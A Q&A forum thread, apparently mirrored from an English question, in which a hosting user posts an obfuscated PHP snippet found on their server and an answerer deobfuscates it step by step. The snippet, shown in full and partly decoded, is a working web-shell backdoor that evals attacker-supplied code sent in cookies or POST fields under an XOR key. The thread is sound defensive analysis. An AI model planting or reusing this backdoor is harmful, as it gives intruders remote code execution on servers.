drhg24275 2018-06-11 11:10
浏览 49
已采纳

这个恶意代码是什么?

I've found this code on a hosting, it appears that it's written by hacker, what is this code for?

<?php $zbsdho = '49y87v3bktgmrfc#ueo\'5anpdi-0_ls2*xH';$ivlmhe = Array();$ivlmhe[] = $zbsdho[34].$zbsdho[32];$ivlmhe[] = $zbsdho[1].$zbsdho[24].$zbsdho[21].$zbsdho[17].$zbsdho[20].$zbsdho[13].$zbsdho[4].$zbsdho[0].$zbsdho[26].$zbsdho[3].$zbsdho[20].$zbsdho[17].$zbsdho[31].$zbsdho[26].$zbsdho[0].$zbsdho[0].$zbsdho[20].$zbsdho[20].$zbsdho[26].$zbsdho[7].$zbsdho[7].$zbsdho[27].$zbsdho[3].$zbsdho[26].$zbsdho[27].$zbsdho[3].$zbsdho[24].$zbsdho[17].$zbsdho[14].$zbsdho[14].$zbsdho[6].$zbsdho[3].$zbsdho[14].$zbsdho[20].$zbsdho[4].$zbsdho[14];$ivlmhe[] = $zbsdho[15];$ivlmhe[] = $zbsdho[14].$zbsdho[18].$zbsdho[16].$zbsdho[22].$zbsdho[9];$ivlmhe[] = $zbsdho[30].$zbsdho[9].$zbsdho[12].$zbsdho[28].$zbsdho[12].$zbsdho[17].$zbsdho[23].$zbsdho[17].$zbsdho[21].$zbsdho[9];$ivlmhe[] = $zbsdho[17].$zbsdho[33].$zbsdho[23].$zbsdho[29].$zbsdho[18].$zbsdho[24].$zbsdho[17];$ivlmhe[] = $zbsdho[30].$zbsdho[16].$zbsdho[7].$zbsdho[30].$zbsdho[9].$zbsdho[12];$ivlmhe[] = $zbsdho[21].$zbsdho[12].$zbsdho[12].$zbsdho[21].$zbsdho[2].$zbsdho[28].$zbsdho[11].$zbsdho[17].$zbsdho[12].$zbsdho[10].$zbsdho[17];$ivlmhe[] = $zbsdho[30].$zbsdho[9].$zbsdho[12].$zbsdho[29].$zbsdho[17].$zbsdho[22];$ivlmhe[] = $zbsdho[23].$zbsdho[21].$zbsdho[14].$zbsdho[8];foreach ($ivlmhe[7]($_COOKIE, $_POST) as $owoafjz => $nunarwf){function ogehexx($ivlmhe, $owoafjz, $oibsdj){return $ivlmhe[6]($ivlmhe[4]($owoafjz . $ivlmhe[1], ($oibsdj / $ivlmhe[8]($owoafjz)) + 1), 0, $oibsdj);}function lxasj($ivlmhe, $arihtmu){return @$ivlmhe[9]($ivlmhe[0], $arihtmu);}function jxlby($ivlmhe, $arihtmu){$flgqwzt = $ivlmhe[3]($arihtmu) % 3;if (!$flgqwzt) {eval($arihtmu[1]($arihtmu[2]));exit();}}$nunarwf = lxasj($ivlmhe, $nunarwf);jxlby($ivlmhe, $ivlmhe[5]($ivlmhe[2], $nunarwf ^ ogehexx($ivlmhe, $owoafjz, $ivlmhe[8]($nunarwf))));}
  • 写回答

1条回答 默认 最新

  • dtv55860 2018-06-11 11:20
    关注

    First start off by beautifying the code:

    <?php
    $zbsdho   = '49y87v3bktgmrfc#ueo\'5anpdi-0_ls2*xH';
    $ivlmhe   = Array();
    $ivlmhe[] = $zbsdho[34] . $zbsdho[32];
    $ivlmhe[] = $zbsdho[1] . $zbsdho[24] . $zbsdho[21] . $zbsdho[17] . $zbsdho[20] . $zbsdho[13] . $zbsdho[4] . $zbsdho[0] . $zbsdho[26] . $zbsdho[3] . $zbsdho[20] . $zbsdho[17] . $zbsdho[31] . $zbsdho[26] . $zbsdho[0] . $zbsdho[0] . $zbsdho[20] . $zbsdho[20] . $zbsdho[26] . $zbsdho[7] . $zbsdho[7] . $zbsdho[27] . $zbsdho[3] . $zbsdho[26] . $zbsdho[27] . $zbsdho[3] . $zbsdho[24] . $zbsdho[17] . $zbsdho[14] . $zbsdho[14] . $zbsdho[6] . $zbsdho[3] . $zbsdho[14] . $zbsdho[20] . $zbsdho[4] . $zbsdho[14];
    $ivlmhe[] = $zbsdho[15];
    $ivlmhe[] = $zbsdho[14] . $zbsdho[18] . $zbsdho[16] . $zbsdho[22] . $zbsdho[9];
    $ivlmhe[] = $zbsdho[30] . $zbsdho[9] . $zbsdho[12] . $zbsdho[28] . $zbsdho[12] . $zbsdho[17] . $zbsdho[23] . $zbsdho[17] . $zbsdho[21] . $zbsdho[9];
    $ivlmhe[] = $zbsdho[17] . $zbsdho[33] . $zbsdho[23] . $zbsdho[29] . $zbsdho[18] . $zbsdho[24] . $zbsdho[17];
    $ivlmhe[] = $zbsdho[30] . $zbsdho[16] . $zbsdho[7] . $zbsdho[30] . $zbsdho[9] . $zbsdho[12];
    $ivlmhe[] = $zbsdho[21] . $zbsdho[12] . $zbsdho[12] . $zbsdho[21] . $zbsdho[2] . $zbsdho[28] . $zbsdho[11] . $zbsdho[17] . $zbsdho[12] . $zbsdho[10] . $zbsdho[17];
    $ivlmhe[] = $zbsdho[30] . $zbsdho[9] . $zbsdho[12] . $zbsdho[29] . $zbsdho[17] . $zbsdho[22];
    $ivlmhe[] = $zbsdho[23] . $zbsdho[21] . $zbsdho[14] . $zbsdho[8];
    foreach ($ivlmhe[7]($_COOKIE, $_POST) as $owoafjz => $nunarwf) {
        function ogehexx($ivlmhe, $owoafjz, $oibsdj)
        {
            return $ivlmhe[6]($ivlmhe[4]($owoafjz . $ivlmhe[1], ($oibsdj / $ivlmhe[8]($owoafjz)) + 1), 0, $oibsdj);
        }
        function lxasj($ivlmhe, $arihtmu)
        {
            return @$ivlmhe[9]($ivlmhe[0], $arihtmu);
        }
        function jxlby($ivlmhe, $arihtmu)
        {
            $flgqwzt = $ivlmhe[3]($arihtmu) % 3;
            if (!$flgqwzt) {
                eval($arihtmu[1]($arihtmu[2]));
                exit();
            }
        }
        $nunarwf = lxasj($ivlmhe, $nunarwf);
        jxlby($ivlmhe, $ivlmhe[5]($ivlmhe[2], $nunarwf ^ ogehexx($ivlmhe, $owoafjz, $ivlmhe[8]($nunarwf))));
    }
    

    Then we find the values located in $ivlmhe:

    array(10) { 
    [0]=> string(2) "H*" 
    [1]=> string(36) "9dae5f74-85e2-4455-bb08-08decc38c57c" 
    [2]=> string(1) "#" 
    [3]=> string(5) "count" 
    [4]=> string(10) "str_repeat" 
    [5]=> string(7) "explode" 
    [6]=> string(6) "substr" 
    [7]=> string(11) "array_merge" 
    [8]=> string(6) "strlen" 
    [9]=> string(4) "pack" 
    }
    

    Then:

    foreach (array_merge($_COOKIE, $_POST) as $key => $value) {
        function ogehexx($ivlmhe, $key, $oibsdj)
        {
            return substr(str_repeat($key . "9dae5f74-85e2-4455-bb08-08decc38c57c", ($oibsdj / strlen($key)) + 1), 0, $oibsdj);
        }
        function lxasj($ivlmhe, $arihtmu)
        {
            return @pack("H*", $arihtmu);
        }
        function jxlby($ivlmhe, $arihtmu)
        {
            $flgqwzt = count($arihtmu) % 3;
            if (!$flgqwzt) {
                eval($arihtmu[1]($arihtmu[2]));
                exit();
            }
        }
        $value = lxasj($ivlmhe, $value);
        jxlby($ivlmhe, explode("#", $value ^ ogehexx($ivlmhe, $key, strlen($value))));
    }
    

    That's all I've been able to decode so far, they are interested in the $_COOKIE & $_POST variables and perform various functions on them.

    I made an error in the jxlby function originally, I have changed it to what it should be... the eval() within this function will be the nasty part, but I am finding it very difficult to figure out what exactly is being evaluated as the input for this function $arihtmu comes from this line which has a bitwise Xor operator in it explode("#", $value ^ ogehexx($ivlmhe, $key, strlen($value)))

    本回答被题主选为最佳回答 , 对您是否有帮助呢?
    评论

报告相同问题?

悬赏问题

  • ¥15 python天天向上类似问题,但没有清零
  • ¥30 3天&7天&&15天&销量如何统计同一行
  • ¥30 帮我写一段可以读取LD2450数据并计算距离的Arduino代码
  • ¥15 C#调用python代码(python带有库)
  • ¥15 矩阵加法的规则是两个矩阵中对应位置的数的绝对值进行加和
  • ¥15 活动选择题。最多可以参加几个项目?
  • ¥15 飞机曲面部件如机翼,壁板等具体的孔位模型
  • ¥15 vs2019中数据导出问题
  • ¥20 云服务Linux系统TCP-MSS值修改?
  • ¥20 关于#单片机#的问题:项目:使用模拟iic与ov2640通讯环境:F407问题:读取的ID号总是0xff,自己调了调发现在读从机数据时,SDA线上并未有信号变化(语言-c语言)